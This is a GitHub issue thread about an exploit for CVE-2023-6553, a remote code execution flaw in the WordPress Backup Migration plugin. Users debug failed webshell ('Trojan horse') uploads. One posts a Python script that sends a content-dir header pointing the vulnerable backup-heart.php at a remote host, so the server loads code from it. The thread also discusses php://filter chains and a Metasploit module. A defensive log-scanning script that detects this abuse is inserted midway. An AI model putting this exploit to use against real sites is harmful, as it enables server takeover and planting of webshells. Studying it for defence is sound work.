CVE-2023-6553

404 not found

Open zzZxby opened this issue 1 year ago • 15 comments

I used version 1.3.6 of backup-backup for testing, but it returned a 404 error and the Trojan horse was not successfully uploaded. What could be the reason for this?

zzZxby avatar Dec 14 '23 07:12 zzZxby

Yeah, I have to add more checks in the code. Not yet reliable enough. It's a v1. I will take care of it soon. Thanks for the feedback.

Chocapikk avatar Dec 14 '23 07:12 Chocapikk

I just got it. I assume you are using Windows. Due to the header length limit I use a system command to write the webshell. Except it's a Linux command and not a Windows one. That's why it's not working here. And I only check the status code and not the length of the content of /includes/backup-heart.php to verify that the characters are correctly written on the server.

Chocapikk avatar Dec 14 '23 07:12 Chocapikk

I've fixed this, thank you very much.

zzZxby avatar Dec 14 '23 08:12 zzZxby

Can you make a PR or share what you did? I could also modify it for Windows ^^ Thanks

Chocapikk avatar Dec 14 '23 08:12 Chocapikk

I wrote a simple Python script to send packets myself and didn't use your exploit.

zzZxby avatar Dec 14 '23 08:12 zzZxby

import requests

# Target: the plugin's backup-heart.php on the lab host
url = 'http://172.18.1.141:80/wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php'
# Remote location handed to the plugin through the content-dir header
content_dir = 'http://172.18.1.2:8000/'

headers = {'content-dir': content_dir}
response = requests.post(url, headers=headers)

print(response.text)  # process the response data

zzZxby avatar Dec 14 '23 08:12 zzZxby

Thank you very much again.

zzZxby avatar Dec 14 '23 08:12 zzZxby

Oh ok, I understand, you used a remote URL to use a shell. Yeah, great. Not sure if it will work with all web server configs. Thanks also.

Chocapikk avatar Dec 14 '23 08:12 Chocapikk
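A defender-side counterpart to the content-dir abuse described in this thread, added here as an example that is not part of the issue, the exploit or the plugin: it assumes Apache has been given a custom LogFormat that records the content-dir request header through %{content-dir}i, and scans constructed access-log lines for requests to backup-heart.php whose header carries a php://filter chain or a remote URL.

```python
import re
from urllib.parse import urlparse

# Assumed Apache LogFormat (constructed for this example):
#   LogFormat "%h %t \"%r\" %>s %b \"%{content-dir}i\"" bmi
# %{content-dir}i records the request header that the vulnerable
# backup-heart.php reads; ordinary browser traffic never sends it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<cdir>[^"]*)"$'
)
TARGET = "/wp-content/plugins/backup-backup/includes/backup-heart.php"

def classify(line):
    """Return a reason string if the line looks like CVE-2023-6553 abuse, else None."""
    m = LOG_RE.match(line)
    if not m or not m.group("path").split("?")[0].endswith(TARGET):
        return None
    cdir = m.group("cdir")
    if cdir in ("", "-"):
        return None  # header absent: the plugin's own normal requests
    if cdir.lower().startswith("php://filter"):
        return "php://filter chain in content-dir"
    if urlparse(cdir).scheme.lower() in ("http", "https", "ftp"):
        return "remote URL in content-dir"
    return "unexpected content-dir value"

def scan(lines):
    """Return (client ip, reason) for every suspicious line, in log order."""
    hits = []
    for line in lines:
        reason = classify(line)
        if reason:
            hits.append((LOG_RE.match(line).group("ip"), reason))
    return hits

# Constructed sample log lines in the format above (addresses from documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 [14/Dec/2023:07:12:00 +0000] "POST /wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 200 0 "http://198.51.100.7:8000/"',
    '192.0.2.10 [14/Dec/2023:07:12:01 +0000] "GET /wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 200 0 "-"',
    '203.0.113.5 [14/Dec/2023:07:12:02 +0000] "POST /wordpress/wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 200 0 "php://filter/convert.base64-encode/resource=php://temp"',
    '192.0.2.11 [14/Dec/2023:07:12:03 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 4567 "-"',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

Because the header is not in the default combined log format, the check only works on logs written with the custom LogFormat above; a WAF rule on the same header value is the equivalent inline control.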

Guys, any reason the filter chain might not work (other than the HTTP header size limit)?
Web Server - Apache 2.4/Ubuntu 22.04
Plugin - 1.3.6/1.3.7

I get 200 response but nothing really happens in the end.

N00BIER avatar Jan 25 '24 13:01 N00BIER

Okay. Well, it's surprising. Was a file still written to your lab? Recently I modified the payload to native PHP and it worked. With the lack of information I can't know.

Chocapikk avatar Jan 25 '24 13:01 Chocapikk

Nothing gets uploaded to /includes. I've also increased the limit on the HTTP header size... I am using a web server (Apache 2.4) in a Docker container listening on http://X.X.X.X:8000. WordPress 6.0.1 with Backup Migration 1.3.7.

N00BIER avatar Jan 25 '24 14:01 N00BIER

Honestly, I don't have a solution at this point. It's already complicated enough to exploit. Feel free to debug; if you have a solution I will update it. There was recently a Metasploit module that does this. Have you tried with that too?

Chocapikk avatar Jan 25 '24 14:01 Chocapikk

For some reason Metasploit (Kali) fails to load the module multi/http/wp_backup_migration_php_filter. The framework is up to date, v6.3.51-dev.

N00BIER avatar Jan 25 '24 15:01 N00BIER

Okay, so I have no idea either. Open an "issue" with Metasploit in this case. Sorry.

Chocapikk avatar Jan 25 '24 15:01 Chocapikk

No problem, I'll get back if I have any findings.

N00BIER avatar Jan 25 '24 15:01 N00BIER